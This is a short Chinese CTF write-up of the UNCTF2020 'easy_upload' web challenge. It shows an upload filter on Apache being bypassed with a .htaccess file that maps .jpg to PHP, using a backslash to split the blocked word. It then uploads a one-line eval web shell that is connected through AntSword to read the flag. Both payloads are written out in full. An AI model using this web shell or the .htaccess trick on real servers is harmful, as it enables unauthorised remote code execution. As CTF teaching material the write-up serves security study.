打开题目链接,就是一个上传界面,fuzz后发现过滤了一些字符,但是可以上传jpg类型的文件

UNCTF2020-WEB:easy_upload(上传绕过|apache|.htaccess解析)

UNCTF2020-WEB:easy_upload(上传绕过|apache|.htaccess解析)

 

 

 

 参考wp发现数据库是使用的apche,并且开启了htaccess配置文件

.htaccess文件(或者"分布式配置文件")提供了针对每个目录改变配置的方法,即在一个特定的目录中放置一个包含指令的文件,其中的指令作用于此目录及其所有子目录

 

我们先上传.htaccess,将jpg转成php执行(使用反斜杠绕过黑名单|类型注意要改为图片类型)

AddType  application/x-httpd-p\
hp .jpg

UNCTF2020-WEB:easy_upload(上传绕过|apache|.htaccess解析)

 

 

 

上传绕过<?php ?>限制的一句话  

<?=eval($_POST['cmd']);

UNCTF2020-WEB:easy_upload(上传绕过|apache|.htaccess解析)

 

 

使用蚁剑连接,查看flag

UNCTF2020-WEB:easy_upload(上传绕过|apache|.htaccess解析)

相关文章:

  • 2021-09-02
  • 2021-05-15
  • 2022-01-26
  • 2021-05-28
  • 2021-09-21
  • 2021-08-01
  • 2021-04-06
猜你喜欢
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2021-04-26
  • 2021-04-28
  • 2021-10-02
  • 2021-10-22
相关资源
相似解决方案